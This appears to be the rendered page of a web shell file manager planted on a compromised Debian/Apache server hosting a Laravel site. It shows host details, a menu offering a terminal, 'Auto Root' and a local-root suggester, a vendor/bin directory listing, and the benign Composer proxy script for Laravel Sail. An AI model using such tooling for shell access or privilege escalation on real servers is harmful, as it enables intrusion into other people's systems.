Linux vmi2545633.contaboserver.net 6.1.0-32-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.129-1 (2025-03-06) x86_64
Apache/2.4.62 (Debian)
Server IP : 127.0.0.1 & Your IP : 127.0.0.1
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
softmedya.net /
vendor /
bin /
Delete
Unzip
Name
Size
Permission
Date
Action
.trash7206
[ DIR ]
drwxr-xr-x
2025-12-13 08:15
carbon
3.25
KB
-rwxr-xr-x
2025-10-09 13:38
patch-type-declarations
3.35
KB
-rwxr-xr-x
2025-10-09 13:38
php-parse
3.27
KB
-rwxr-xr-x
2025-10-09 13:38
phpunit
3.6
KB
-rwxr-xr-x
2025-10-09 13:38
pint
3.25
KB
-rwxr-xr-x
2025-10-09 13:38
psysh
3.24
KB
-rwxr-xr-x
2025-10-09 13:38
sail
948
B
-rwxr-xr-x
2025-10-09 13:38
var-dump-server
3.32
KB
-rwxr-xr-x
2025-10-09 13:38
yaml-lint
3.29
KB
-rwxr-xr-x
2025-10-09 13:38
Save
Rename
#!/usr/bin/env sh # Support bash to support `source` with fallback on $0 if this does not run with bash # https://stackoverflow.com/a/35006505/6512 selfArg="$BASH_SOURCE" if [ -z "$selfArg" ]; then selfArg="$0" fi self=$(realpath $selfArg 2> /dev/null) if [ -z "$self" ]; then self="$selfArg" fi dir=$(cd "${self%[/\\]*}" > /dev/null; cd '../laravel/sail/bin' && pwd) if [ -d /proc/cygdrive ]; then case $(which php) in $(readlink -n /proc/cygdrive)/*) # We are in Cygwin using Windows php, so the path must be translated dir=$(cygpath -m "$dir"); ;; esac fi export COMPOSER_RUNTIME_BIN_DIR="$(cd "${self%[/\\]*}" > /dev/null; pwd)" # If bash is sourcing this file, we have to source the target as well bashSource="$BASH_SOURCE" if [ -n "$bashSource" ]; then if [ "$bashSource" != "$0" ]; then source "${dir}/sail" "$@" return fi fi exec "${dir}/sail" "$@"